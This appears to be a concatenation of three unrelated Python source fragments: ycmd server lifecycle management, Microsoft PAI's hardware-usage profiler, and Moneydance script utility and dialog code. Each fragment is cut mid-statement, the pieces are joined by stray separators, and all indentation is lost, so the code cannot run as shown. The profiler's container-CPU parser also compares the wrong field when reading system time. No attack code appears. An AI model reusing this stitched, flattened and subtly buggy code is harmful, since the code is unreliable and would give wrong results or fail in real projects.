ycmd_server_hostname = '127.0.0.1'
ycmd_server_port = get_unused_port(ycmd_server_hostname)
ycmd_server_label = get_base_name(working_directory)
# initialize connection parameters asap to set up the instance logger:
with self._lock:
self.hostname = ycmd_server_hostname
self.port = ycmd_server_port
try:
ycmd_hmac_secret = new_hmac_secret(
num_bytes=YCMD_HMAC_SECRET_LENGTH,
)
ycmd_settings_tempfile_path = write_ycmd_settings_file(
ycmd_settings_path, ycmd_hmac_secret,
)
if ycmd_settings_tempfile_path is None:
self._logger.error(
'failed to generate ycmd server settings file, '
'cannot start server'
)
raise RuntimeError(
'failed to generate ycmd server settings file'
)
# NOTE : This does not start the process.
ycmd_process_handle = prepare_ycmd_process(
startup_parameters, ycmd_settings_tempfile_path,
ycmd_server_hostname, ycmd_server_port,
)
except Exception as e:
self._logger.error(
'failed to prepare ycmd server process: %r', e, exc_info=True,
)
self.set_status(Server.NULL)
return
self._logger.debug(
'successfully prepared server process, about to start it'
)
with self._lock:
self._process_handle = ycmd_process_handle
self._stdout_log_handle = ycmd_process_handle.filehandles.stdout
self._stderr_log_handle = ycmd_process_handle.filehandles.stderr
self._startup_parameters = startup_parameters
self._settings_tempfile_path = ycmd_settings_tempfile_path
self.hostname = ycmd_server_hostname
self.port = ycmd_server_port
self.hmac = ycmd_hmac_secret
self.label = ycmd_server_label
def _check_and_remove_settings_tmp():
try:
if is_file(ycmd_settings_tempfile_path):
self._logger.debug(
'removing temporary settings file: %s',
ycmd_settings_tempfile_path,
)
os.remove(ycmd_settings_tempfile_path)
except Exception as e:
self._logger.warning(
'failed to remove temporary settings file: %r',
ycmd_settings_tempfile_path,
)
try:
ycmd_process_handle.start()
except ValueError as e:
self._logger.error(
'failed to launch ycmd server, argument error: %s', e,
)
_check_and_remove_settings_tmp()
except OSError as e:
self._logger.warning(
'failed to launch ycmd server, system error: %s', e,
)
_check_and_remove_settings_tmp()
if ycmd_process_handle.alive():
self._logger.debug('process launched successfully!')
self.set_status(Server.RUNNING)
else:
# nothing much we can do here - caller can check the output
self._logger.debug(
'process is no longer alive, there was probably an error'
)
self.set_status(Server.NULL)
def stop(self, hard=False, timeout=None):
with self._lock:
if not self.is_alive(timeout=0):
self._logger.debug('not alive, nothing to stop, returning')
return
if hard:
self._process_handle.kill()
elif not self.is_stopping():
self._send_request(
YCMD_HANDLER_SHUTDOWN, method='POST', timeout=timeout,
)
else:
self._logger.debug(
'already sent a shutdown request, not sending another one'
)
self.set_status(Server.STOPPING)
# release lock before waiting
process_handle = self._process_handle
process_handle.wait(timeout=timeout)
# if that didn't raise a `TimeoutError`, then the process is dead!
with self._lock:
self.set_status(Server.NULL)
@lock_guard()
def is_null(self):
if self._status != Server.NULL:
self._logger.debug('status is not null, assuming handle is valid')
return False
if self._process_handle is not None:
self._logger.warning(
'status is null, but process handle is not null, '
'clearing handle: %r', self._process_handle
)
self._process_handle = None
return True
@lock_guard()
def is_starting(self):
return self._status == Server.STARTING
@lock_guard()
def is_alive(self, timeout=None):
if self._status not in [Server.RUNNING, Server.STOPPING]:
self._logger.debug('status is not running, assuming not alive')
return False
self._logger.debug('checking process handle: %r', self._process_handle)
if not self._process_handle:
if self._status != Server.STOPPING:
self._logger.warning(
'status is running, but no process handle exists, '
'changing to null status'
)
self.set_status(Server.NULL)
return False
if not self._process_handle.alive():
self._logger.debug('process has died, changing to null status')
self._process_handle = None
self.set_status(Server.NULL)
return False
if self._status == Server.STOPPING:
# don't bother sending a health check request - it's shutting down
self._logger.debug(
'server is shutting down, so treating it as not alive, '
'returning false'
)
return False
if timeout == 0:
# treat this as a "quick" check, and optimistically return true
# (the caller should be aware of the implications)
self._logger.debug(
'timeout is 0, so not sending health-check request, '
'returning true'
)
return True
try:
response = self._send_request(
YCMD_HANDLER_HEALTHY, timeout=timeout,
)
except TimeoutError:
self._logger.debug(
'request timed out, server may be alive, but returning false'
)
# as noted, server may be alive, so don't change running status
return False
except Exception as e:
self._logger.warning('error during health check: %r', e)
response = None
if response is None:
self._logger.debug('health check failed, changing to null status')
self._process_handle = None
self.set_status(Server.NULL)
return False
return True
@lock_guard()
def is_stopping(self):
return self._status == Server.STOPPING
@lock_guard()
def communicate(self, inpt=None, timeout=None):
self._logger.warning('[DEPRECATED] communicate - use stdout/stderr')
if not self._process_handle:
self._logger.debug('no process handle, cannot communicate')
return None, None
assert isinstance(self._process_handle, Process), \
'[internal] process handle is not Process: %r' % \
(self._process_handle)
return self._process_handle.communicate(inpt=inpt, timeout=timeout)
def wait_for_status(self, status=None, timeout=None):
'''
Waits for the server status to change.
If `status` is omitted, any status change will cause this to return.
Otherwise, if `status` is a `Server` constant, then this will block
until that status is reached. If `status` is a `list` of constants,
then any status in that list will be awaited.
If `timeout` is omitted, this will block indefinitely.
Otherwise, `timeout` should be the number of seconds to wait for until
a `TimeoutError` is | |
<reponame>luxius-luminus/pai<filename>contrib/profiler/profiler.py
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above
# copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
The profiler is used to profile the using information of the hardware while a deep learing model is running
"""
import pynvml as nv
import numpy as np
import pandas as pd
import glob
import csv
import os
import time
import argparse
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from utils import Sample
from utils import Adviser
from utils import print_process
from utils import GPU_INFO_OFFSET
from utils import INFO_NUM_PER_GPU
from utils import GPU_MEM_OFFSET
from utils import SAMPLE_INFO
# To get the CPU running time of system from being booted
def get_system_cpu_ticks():
with open('/proc/stat', 'r') as f:
for line in f.readlines():
if line.startswith('cpu '):
items = line.split()
if len(items) < 8:
return -1
total_clock_ticks = 0
for item in items[1:8]:
total_clock_ticks += int(item)
return total_clock_ticks
return -1
# To get the CPU running time of container from being booted
def get_container_cpu_ticks(file_name):
user_time = 0
system_time = 0
with open(file_name, 'r') as f:
for line in f:
items = line.split()
if len(items) != 2:
return -1
if items[0] == 'user':
user_time = int(items[1])
elif items[1] == 'system':
system_time = int(items[1])
return user_time + system_time
def get_cpu_ticks(file_name):
sys_ticks = get_system_cpu_ticks()
container_ticks = get_container_cpu_ticks(file_name)
return [sys_ticks, container_ticks]
def get_gpu_utilization(gpu_idx):
try:
handle = nv.nvmlDeviceGetHandleByIndex(gpu_idx)
util = nv.nvmlDeviceGetUtilizationRates(handle)
except nv.NVMLError as err:
util = err
return util
def get_gpu_memory(gpu_idx):
try:
handle = nv.nvmlDeviceGetHandleByIndex(gpu_idx)
mem = nv.nvmlDeviceGetMemoryInfo(handle)
except nv.NVMLError as err:
mem = err
return mem
def get_memory_percent(file_name):
total_memory_path = '/proc/meminfo'
memory_docker_used = 0.0
total_memory = 1.0
with open(file_name, 'r') as f:
for line in f:
memory_docker_used = int(line)
with open(total_memory_path, 'r') as f:
for line in f:
if line.startswith('MemTotal'):
lines = line.split()
total_memory = int(lines[1]) * 1024
break
return [memory_docker_used, total_memory]
def get_disk_bytes(file_name):
read_bytes, write_bytes = 0, 0
with open(file_name, 'r') as f:
for line in f:
items = line.split()
if len(items) != 3 and len(items) != 2:
return -1
if items[1] == 'Read':
read_bytes += int(items[2])
elif items[1] == 'Write':
write_bytes += int(items[2])
return [read_bytes, write_bytes]
def get_network_bytes(file_name):
receive_bytes, transmit_bytes = 0, 0
with open(file_name, 'r') as f:
for line in f:
if len(line.split()) != 17:
continue
else:
items = line.split()
receive_bytes += int(items[1])
transmit_bytes += int(items[9])
return [receive_bytes, transmit_bytes]
Byte_GiByte = 1024 * 1024 * 1024
Byte_MiByte = 1024 * 1024
Byte_KiByte = 1024
# get the sample data according to the system file
def get_sample_data(cpu_file, mem_file, blk_file, net_file, gpu_id, period):
[mem_used, mem_total] = get_memory_percent(mem_file)
# 1st info about I/O, network and CPU
# read_bytes1 = get_disk_read_bytes(blk_file)
# write_bytes1 = get_disk_write_bytes(blk_file)
[read_bytes1, write_bytes1] = get_disk_bytes(blk_file)
[network_receive1, network_transmit1] = get_network_bytes(net_file)
[sys_ticks1, container_ticks1] = get_cpu_ticks(cpu_file)
time.sleep(period)
# 2nd info about I/O, network and CPU, calculate how many bytes used in this period
# read_bytes2 = get_disk_read_bytes(blk_file)
# write_bytes2 = get_disk_write_bytes(blk_file)
[read_bytes2, write_bytes2] = get_disk_bytes(blk_file)
[network_receive2, network_transmit2] = get_network_bytes(net_file)
[sys_ticks2, container_ticks2] = get_cpu_ticks(cpu_file)
online_cpus = os.sysconf(os.sysconf_names['SC_NPROCESSORS_ONLN'])
cpu_usage = (container_ticks2 - container_ticks1) * 1.0 / (sys_ticks2 - sys_ticks1) * online_cpus * 100
# get the usage of the GPU to analyze
gpu_usage = list()
gpu_mem = list()
gpu_mem_used = list()
gpu_mem_total = list()
for gid in gpu_id:
gpu_usage.append(get_gpu_utilization(gid).gpu)
gpu_mem.append(get_gpu_utilization(gid).memory)
gpu_mem_used.append(get_gpu_memory(gid).used / Byte_GiByte)
gpu_mem_total.append(get_gpu_memory(gid).total / Byte_GiByte)
sample_data = Sample(cpu_usage, mem_used / Byte_GiByte, mem_total / Byte_GiByte,
(read_bytes2 - read_bytes1) / period / Byte_KiByte,
(write_bytes2 - write_bytes1) / period / Byte_KiByte,
(network_receive2 - network_receive1) / period / Byte_KiByte,
(network_transmit2 - network_transmit1) / period / Byte_KiByte,
gpu_usage, gpu_mem, gpu_mem_used, gpu_mem_total)
return sample_data
# draw the graphs and save them to the files
def draw_graph(sample_datas, output_dir, period, gpu_id):
if not os.path.exists(output_dir + '/img'):
os.mkdir(output_dir + '/img')
sample_datas = np.array(sample_datas)
gpu_nums = len(gpu_id)
# draw the GPU memory usage
gpu_mem, legends, times = list(), list(), list()
for i in range(int(gpu_nums)):
gpu_mem.append(100 * sample_datas[:, GPU_INFO_OFFSET + GPU_MEM_OFFSET + i * INFO_NUM_PER_GPU] /
sample_datas[:, GPU_INFO_OFFSET + GPU_MEM_OFFSET + i * INFO_NUM_PER_GPU + 1]
)
legends.append('gpu_mem_used_' + str(gpu_id[i]))
for i in range(sample_datas.shape[0]):
times.append(i * period)
plt.figure()
plt.title('GPU Memory Utilization')
plt.xlabel('Time(s)')
plt.ylabel('GPU memory utilization(%)')
plt.plot(times, np.array(gpu_mem).T)
plt.legend(legends)
plt.grid(True)
plt.savefig(output_dir + '/img/GPU_MEM_Utilization.png')
# draw the GPU usage
gpu_usage, legends, times = list(), list(), list()
for i in range(int(gpu_nums)):
gpu_usage.append(sample_datas[:, GPU_INFO_OFFSET + i * INFO_NUM_PER_GPU])
legends.append('gpu_used_' + str(gpu_id[i]))
for i in range(sample_datas.shape[0]):
times.append(i * period)
plt.figure()
plt.title('GPU Utilization')
plt.xlabel('Time(s)')
plt.ylabel('GPU utilization(%)')
plt.plot(times, np.array(gpu_usage).T)
plt.legend(legends)
plt.grid(True)
plt.savefig(output_dir + '/img/GPU_UTI_Utilization.png')
# draw the CPU and GPU usage
times = list()
length = sample_datas.shape[0]
gpu_usage = sample_datas[int(0.6 * length):int(0.6 * length) + 1000, GPU_INFO_OFFSET]
cpu_usage = sample_datas[int(0.6 * length):int(0.6 * length) + 1000, SAMPLE_INFO.cpu_usage.value]
for i in range(gpu_usage.shape[0]):
times.append(i * period)
fig = plt.figure()
a1 = fig.add_subplot(111)
a1.set_title('CPU & GPU Utilization')
a1.plot(times, cpu_usage, label='cpu')
plt.legend(loc='best')
a1.set_ylim([0, np.max(cpu_usage) if np.max(cpu_usage) > 100 else 100])
a1.set_ylabel('CPU utilization(%)')
a1.set_xlabel('Time(s)')
a2 = a1.twinx()
a2.plot(times, gpu_usage, 'orange', label='gpu')
plt.legend(loc='best')
a2.set_ylim([0, 100])
a2.set_ylabel('GPU utilization(%)')
plt.grid(True)
plt.savefig(output_dir + '/img/CPU_GPU_Utilization.png')
# draw the IO usage
times = list()
# index 3 and 4 are the column of the I/O rate
io_rate = [sample_datas[:, SAMPLE_INFO.io_read.value], sample_datas[:, SAMPLE_INFO.io_write.value]]
legends = ['Disk read', 'Disk write']
for i in range(sample_datas.shape[0]):
times.append(i * period)
plt.figure()
plt.title('Disk Utilization')
plt.xlabel('Time(s)')
plt.ylabel('Disk Utilization(KBps)')
plt.plot(times, np.array(io_rate).T)
plt.legend(legends)
plt.grid(True)
plt.savefig(output_dir + '/img/Disk_Utilization.png')
# draw the network usage
times = list()
# index 5 and 6 are the column of the network rate
network_rate = [sample_datas[:, SAMPLE_INFO.network_inbound.value],
sample_datas[:, SAMPLE_INFO.network_outbound.value]]
legends = ['Network Inbound', 'Network Outbound']
for i in range(sample_datas.shape[0]):
times.append(i * period)
plt.figure()
plt.title('Network Usage')
plt.xlabel('Time(s)')
plt.ylabel('Network Utilization(KBps)')
plt.plot(times, np.array(network_rate).T)
plt.legend(legends)
plt.grid(True)
plt.savefig(output_dir + '/img/Network_Utilization.png')
def analyze_value(sample_datas, period, gpu_id):
sample_datas = np.array(sample_datas)
gpu_nums = len(gpu_id)
# analyze the CPU usage
# index 0 is the CPU usage
cpu_usage = np.sort(sample_datas[:, SAMPLE_INFO.cpu_usage.value])
print('For the CPU, here is the analyze result:')
print('The max value of the CPU Utilization is', str(np.max(cpu_usage)) + '%')
print('The min value of the CPU Utilization is', str(np.min(cpu_usage)) + '%')
print('The average value of the CPU Utilization is', str(np.average(cpu_usage)) + '%')
print('The standard deviation of the CPU Utilization is', str(np.std(cpu_usage)) + '%')
print('Less than 50% value is more than', str(cpu_usage[int(0.5 * cpu_usage.shape[0])]) + '%')
print('Less than 20% value is more than', str(cpu_usage[int(0.8 * cpu_usage.shape[0])]) + '%')
print('===================================================================')
# analyze the Disk
# index 3 and 4 are the Disk read and write
disk_read = np.sort(sample_datas[:, SAMPLE_INFO.io_read.value])
disk_write = np.sort(sample_datas[:, SAMPLE_INFO.io_write.value])
print('For the Disk, here is the analyze result:')
print('The max value of the Disk read is', str(np.max(disk_read)) + 'KBps')
min_read = 0
for i in range(disk_read.shape[0]):
min_read = disk_read[i]
if min_read > 0:
break
print('The min value of the Disk read (without zero) is', str(min_read) + 'KBps')
print('The max value of the Disk write is', str(np.max(disk_write)) + 'KBps')
min_write = 0
for i in range(disk_write.shape[0]):
min_write = disk_write[i]
if min_write > 0:
break
print('The min value of the Disk write (without zero) is', str(min_write) + 'KBps')
print('The total read volume of the Disk is', str(np.sum(disk_read) * period) + 'KB')
print('The total write volume of the Disk is', str(np.sum(disk_write) * period) + 'KB')
print('===================================================================')
# analyze the Network
# index 5 and 6 are the Network inbound and outbound
network_inbound = np.sort(sample_datas[:, SAMPLE_INFO.network_inbound.value])
network_outbound = np.sort(sample_datas[:, SAMPLE_INFO.network_outbound.value])
print('For the Network, here is the analyze result:')
print('The | |
/ summary screen widget. Display the total of selected Account Balances
total_selected_transactions: One-click. Shows a popup total of the register txn amounts selected on screen
Extension (.mxt) and Script (.py) Versions available:
extract_data Extract various data to screen and/or csv.. Consolidation of:
- stockglance2020 View summary of Securities/Stocks on screen, total by Security, export to csv
- extract_reminders_csv View reminders on screen, edit if required, extract all to csv
- extract_currency_history_csv Extract currency history to csv
- extract_investment_transactions_csv Extract investment transactions to csv
- extract_account_registers_csv Extract Account Register(s) to csv along with any attachments
list_future_reminders: View future reminders on screen. Allows you to set the days to look forward
A collection of useful ad-hoc scripts (zip file)
useful_scripts: Just unzip and select the script you want for the task at hand...
Visit: %s (Author's site)
----------------------------------------------------------------------------------------------------------------------
""" %(myScriptName, MYPYTHON_DOWNLOAD_URL)
def cleanup_references():
global MD_REF, MD_REF_UI, MD_EXTENSION_LOADER
myPrint("DB","About to delete reference to MD_REF, MD_REF_UI and MD_EXTENSION_LOADER....!")
del MD_REF, MD_REF_UI, MD_EXTENSION_LOADER
def load_text_from_stream_file(theStream):
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()")
cs = Charset.forName("UTF-8")
istream = theStream
if not istream:
myPrint("B","... Error - the input stream is None")
return "<NONE>"
fileContents = ""
istr = bufr = None
try:
istr = InputStreamReader(istream, cs)
bufr = BufferedReader(istr)
while True:
line = bufr.readLine()
if line is not None:
line += "\n"
fileContents+=line
continue
break
fileContents+="\n<END>"
except:
myPrint("B", "ERROR reading from input stream... ")
dump_sys_error_to_md_console_and_errorlog()
try: bufr.close()
except: pass
try: istr.close()
except: pass
try: istream.close()
except: pass
myPrint("DB", "Exiting ", inspect.currentframe().f_code.co_name, "()")
return fileContents
# P=Display on Python Console, J=Display on MD (Java) Console Error Log, B=Both, D=If Debug Only print, DB=print both
def myPrint(where, *args):
global myScriptName, debug, i_am_an_extension_so_run_headless
if where[0] == "D" and not debug: return
printString = ""
for what in args:
printString += "%s " %what
printString = printString.strip()
if where == "P" or where == "B" or where[0] == "D":
if not i_am_an_extension_so_run_headless:
try:
print(printString)
except:
print("Error writing to screen...")
dump_sys_error_to_md_console_and_errorlog()
if where == "J" or where == "B" or where == "DB":
dt = datetime.datetime.now().strftime("%Y/%m/%d-%H:%M:%S")
try:
System.err.write(myScriptName + ":" + dt + ": ")
System.err.write(printString)
System.err.write("\n")
except:
System.err.write(myScriptName + ":" + dt + ": "+"Error writing to console")
dump_sys_error_to_md_console_and_errorlog()
return
def dump_sys_error_to_md_console_and_errorlog( lReturnText=False ):
theText = ""
myPrint("B","Unexpected error caught: %s" %(sys.exc_info()[0]))
myPrint("B","Unexpected error caught: %s" %(sys.exc_info()[1]))
myPrint("B","Error on Script Line Number: %s" %(sys.exc_info()[2].tb_lineno))
if lReturnText:
theText += "\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
theText += "Unexpected error caught: %s\n" %(sys.exc_info()[0])
theText += "Unexpected error caught: %s\n" %(sys.exc_info()[1])
theText += "Error on Script Line Number: %s\n" %(sys.exc_info()[2].tb_lineno)
theText += "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\n"
return theText
return
def pad(theText, theLength):
theText = theText[:theLength].ljust(theLength, u" ")
return theText
def rpad(theText, theLength):
if not (isinstance(theText, unicode) or isinstance(theText, str)):
theText = str(theText)
theText = theText[:theLength].rjust(theLength, u" ")
return theText
def cpad(theText, theLength):
if not (isinstance(theText, unicode) or isinstance(theText, str)):
theText = str(theText)
if len(theText)>=theLength: return theText[:theLength]
padLength = int((theLength - len(theText)) / 2)
theText = theText[:theLength]
theText = ((" "*padLength)+theText+(" "*padLength))[:theLength]
return theText
myPrint("B", myScriptName, ": Python Script Initialising.......", "Build:", version_build)
def getMonoFont():
global debug
try:
theFont = MD_REF.getUI().getFonts().code
# if debug: myPrint("B","Success setting Font set to Moneydance code: %s" %theFont)
except:
theFont = Font("monospaced", Font.PLAIN, 15)
if debug: myPrint("B","Failed to Font set to Moneydance code - So using: %s" %theFont)
return theFont
def getTheSetting(what):
x = MD_REF.getPreferences().getSetting(what, None)
if not x or x == u"": return None
return what + u": %s" %(x)
def get_home_dir():
homeDir = None
# noinspection PyBroadException
try:
if Platform.isOSX():
homeDir = System.getProperty(u"UserHome") # On a Mac in a Java VM, the homedir is hidden
else:
# homeDir = System.getProperty("user.home")
homeDir = os.path.expanduser(u"~") # Should work on Unix and Windows
if homeDir is None or homeDir == u"":
homeDir = System.getProperty(u"user.home")
if homeDir is None or homeDir == u"":
homeDir = os.environ.get(u"HOMEPATH")
except:
pass
if not homeDir: homeDir = u"?"
return homeDir
def getDecimalPoint(lGetPoint=False, lGetGrouping=False):
global debug
decimalFormat = DecimalFormat.getInstance()
# noinspection PyUnresolvedReferences
decimalSymbols = decimalFormat.getDecimalFormatSymbols()
if not lGetGrouping: lGetPoint = True
if lGetGrouping and lGetPoint: return u"error"
try:
if lGetPoint:
_decimalCharSep = decimalSymbols.getDecimalSeparator()
myPrint(u"D",u"Decimal Point Character: %s" %(_decimalCharSep))
return _decimalCharSep
if lGetGrouping:
_groupingCharSep = decimalSymbols.getGroupingSeparator()
if _groupingCharSep is None or _groupingCharSep == u"":
myPrint(u"B", u"Caught empty Grouping Separator")
return u""
if ord(_groupingCharSep) >= 128: # Probably a nbsp (160) = e.g. South Africa for example..!
myPrint(u"B", u"Caught special character in Grouping Separator. Ord(%s)" %(ord(_groupingCharSep)))
if ord(_groupingCharSep) == 160:
return u" (non breaking space character)"
return u" (non printable character)"
myPrint(u"D",u"Grouping Separator Character:", _groupingCharSep)
return _groupingCharSep
except:
myPrint(u"B",u"Error in getDecimalPoint() routine....?")
dump_sys_error_to_md_console_and_errorlog()
return u"error"
decimalCharSep = getDecimalPoint(lGetPoint=True)
groupingCharSep = getDecimalPoint(lGetGrouping=True)
# JOptionPane.DEFAULT_OPTION, JOptionPane.YES_NO_OPTION, JOptionPane.YES_NO_CANCEL_OPTION, JOptionPane.OK_CANCEL_OPTION
# JOptionPane.ERROR_MESSAGE, JOptionPane.INFORMATION_MESSAGE, JOptionPane.WARNING_MESSAGE, JOptionPane.QUESTION_MESSAGE, JOptionPane.PLAIN_MESSAGE
# Copies MD_REF.getUI().showInfoMessage
def myPopupInformationBox(theParent=None, theMessage="What no message?!", theTitle="Info", theMessageType=JOptionPane.INFORMATION_MESSAGE):
if theParent is None:
if theMessageType == JOptionPane.PLAIN_MESSAGE or theMessageType == JOptionPane.INFORMATION_MESSAGE:
icon_to_use=MD_REF.getUI().getIcon("/com/moneydance/apps/md/view/gui/glyphs/appicon_64.png")
JOptionPane.showMessageDialog(theParent, JTextPanel(theMessage), theTitle, theMessageType, icon_to_use)
return
JOptionPane.showMessageDialog(theParent, JTextPanel(theMessage), theTitle, theMessageType)
return
def wrapLines(message, numChars=40):
charCount = 0
result=""
for ch in message:
if ch == '\n' or ch == '\r':
charCount = 0
elif charCount > numChars and not Character.isWhitespace(ch):
result+="\n"
charCount = 0
else:
charCount+=1
result+=ch
return result
def myPopupAskBackup(theParent=None, theMessage="What no message?!", lReturnTheTruth=False):
_options=["STOP", "PROCEED WITHOUT BACKUP", "DO BACKUP NOW"]
response = JOptionPane.showOptionDialog(theParent,
theMessage,
"PERFORM BACKUP BEFORE UPDATE?",
0,
JOptionPane.WARNING_MESSAGE,
None,
_options,
_options[0])
if response == 2:
myPrint("B", "User requested to perform Export Backup before update/fix - calling moneydance export backup routine...")
MD_REF.getUI().setStatus("%s performing an Export Backup...." %(myScriptName),-1.0)
MD_REF.getUI().saveToBackup(None)
MD_REF.getUI().setStatus("%s Export Backup completed...." %(myScriptName),0)
return True
elif response == 1:
myPrint("B", "User DECLINED to perform Export Backup before update/fix...!")
if not lReturnTheTruth:
return True
return False
# Copied MD_REF.getUI().askQuestion
def myPopupAskQuestion(theParent=None,
theTitle="Question",
theQuestion="What?",
theOptionType=JOptionPane.YES_NO_OPTION,
theMessageType=JOptionPane.QUESTION_MESSAGE):
icon_to_use = None
if theParent is None:
if theMessageType == JOptionPane.PLAIN_MESSAGE or theMessageType == JOptionPane.INFORMATION_MESSAGE:
icon_to_use=MD_REF.getUI().getIcon("/com/moneydance/apps/md/view/gui/glyphs/appicon_64.png")
# question = wrapLines(theQuestion)
question = theQuestion
result = JOptionPane.showConfirmDialog(theParent,
question,
theTitle,
theOptionType,
theMessageType,
icon_to_use) # getIcon("/com/moneydance/apps/md/view/gui/glyphs/appicon_64.png"))
return result == 0
# Copies Moneydance .askForQuestion
def myPopupAskForInput(theParent,
theTitle,
theFieldLabel,
theFieldDescription="",
defaultValue=None,
isPassword=False,
theMessageType=JOptionPane.INFORMATION_MESSAGE):
icon_to_use = None
if theParent is None:
if theMessageType == JOptionPane.PLAIN_MESSAGE or theMessageType == JOptionPane.INFORMATION_MESSAGE:
icon_to_use=MD_REF.getUI().getIcon("/com/moneydance/apps/md/view/gui/glyphs/appicon_64.png")
p = JPanel(GridBagLayout())
defaultText = None
if defaultValue: defaultText = defaultValue
if isPassword:
field = JPasswordField(defaultText)
else:
field = JTextField(defaultText)
x = 0
if theFieldLabel:
p.add(JLabel(theFieldLabel), GridC.getc(x, 0).east())
x+=1
p.add(field, GridC.getc(x, 0).field())
p.add(Box.createHorizontalStrut(244), GridC.getc(x, 0))
if theFieldDescription:
p.add(JTextPanel(theFieldDescription), GridC.getc(x, 1).field().colspan(x + 1))
if (JOptionPane.showConfirmDialog(theParent,
p,
theTitle,
JOptionPane.OK_CANCEL_OPTION,
theMessageType,
icon_to_use) == 0):
return field.getText()
return None
# APPLICATION_MODAL, DOCUMENT_MODAL, MODELESS, TOOLKIT_MODAL
class MyPopUpDialogBox():
def __init__(self, theParent=None, theStatus="", theMessage="", theWidth=200, theTitle="Info", lModal=True, lCancelButton=False, OKButtonText="OK", lAlertLevel=0):
self.theParent = theParent
self.theStatus = theStatus
self.theMessage = theMessage
self.theWidth = max(80,theWidth)
self.theTitle = theTitle
self.lModal = lModal
self.lCancelButton = lCancelButton
self.OKButtonText = OKButtonText
self.lAlertLevel = lAlertLevel
self.fakeJFrame = None
self._popup_d = None
self.lResult = [None]
if not self.theMessage.endswith("\n"): self.theMessage+="\n"
if self.OKButtonText == "": self.OKButtonText="OK"
class WindowListener(WindowAdapter):
def __init__(self, theDialog, theFakeFrame, lResult):
self.theDialog = theDialog
self.theFakeFrame = theFakeFrame
self.lResult = lResult
def windowClosing(self, WindowEvent): # noqa
global debug
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()", "Event: ", WindowEvent)
myPrint("DB", "SwingUtilities.isEventDispatchThread() = %s" %(SwingUtilities.isEventDispatchThread()))
myPrint("DB", "JDialog Frame shutting down....")
self.lResult[0] = False
# Note - listeners are already on the EDT
if self.theFakeFrame is not None:
self.theDialog.dispose()
self.theFakeFrame.dispose()
else:
self.theDialog.dispose()
myPrint("D", "Exiting ", inspect.currentframe().f_code.co_name, "()")
return
class OKButtonAction(AbstractAction):
# noinspection PyMethodMayBeStatic
def __init__(self, theDialog, theFakeFrame, lResult):
self.theDialog = theDialog
self.theFakeFrame = theFakeFrame
self.lResult = lResult
def actionPerformed(self, event):
global debug
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()", "Event: ", event)
myPrint("DB", "SwingUtilities.isEventDispatchThread() = %s" %(SwingUtilities.isEventDispatchThread()))
self.lResult[0] = True
# Note - listeners are already on the EDT
if self.theFakeFrame is not None:
self.theDialog.dispose()
self.theFakeFrame.dispose()
else:
self.theDialog.dispose()
myPrint("D", "Exiting ", inspect.currentframe().f_code.co_name, "()")
return
class CancelButtonAction(AbstractAction):
# noinspection PyMethodMayBeStatic
def __init__(self, theDialog, theFakeFrame, lResult):
self.theDialog = theDialog
self.theFakeFrame = theFakeFrame
self.lResult = lResult
def actionPerformed(self, event):
global debug
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()", "Event: ", event)
myPrint("DB", "SwingUtilities.isEventDispatchThread() = %s" %(SwingUtilities.isEventDispatchThread()))
self.lResult[0] = False
# Note - listeners are already on the EDT
if self.theFakeFrame is not None:
self.theDialog.dispose()
self.theFakeFrame.dispose()
else:
self.theDialog.dispose()
myPrint("D", "Exiting ", inspect.currentframe().f_code.co_name, "()")
return
def kill(self):
global debug
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()")
myPrint("DB", "SwingUtilities.isEventDispatchThread() = %s" %(SwingUtilities.isEventDispatchThread()))
if not SwingUtilities.isEventDispatchThread():
SwingUtilities.invokeLater(GenericVisibleRunnable(self._popup_d, False))
if self.fakeJFrame is not None:
SwingUtilities.invokeLater(GenericDisposeRunnable(self._popup_d))
SwingUtilities.invokeLater(GenericDisposeRunnable(self.fakeJFrame))
else:
SwingUtilities.invokeLater(GenericDisposeRunnable(self._popup_d))
else:
self._popup_d.setVisible(False)
if self.fakeJFrame is not None:
self._popup_d.dispose()
self.fakeJFrame.dispose()
else:
self._popup_d.dispose()
myPrint("D", "Exiting ", inspect.currentframe().f_code.co_name, "()")
return
def result(self):
global debug
return self.lResult[0]
def go(self):
global debug
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()")
myPrint("DB", "SwingUtilities.isEventDispatchThread() = %s" %(SwingUtilities.isEventDispatchThread()))
class MyPopUpDialogBoxRunnable(Runnable):
def __init__(self, callingClass):
self.callingClass = callingClass
def run(self): # noqa
myPrint("DB", "In ", inspect.currentframe().f_code.co_name, "()")
myPrint("DB", "SwingUtilities.isEventDispatchThread() = %s" %(SwingUtilities.isEventDispatchThread()))
# Create a fake JFrame so we can set the Icons...
if self.callingClass.theParent is None:
self.callingClass.fakeJFrame = MyJFrame()
self.callingClass.fakeJFrame.setName(u"%s_fake_dialog" %(myModuleID))
self.callingClass.fakeJFrame.setDefaultCloseOperation(WindowConstants.DO_NOTHING_ON_CLOSE)
self.callingClass.fakeJFrame.setUndecorated(True)
self.callingClass.fakeJFrame.setVisible( False )
if not Platform.isOSX():
self.callingClass.fakeJFrame.setIconImage(MDImages.getImage(MD_REF.getSourceInformation().getIconResource()))
if self.callingClass.lModal:
# noinspection PyUnresolvedReferences
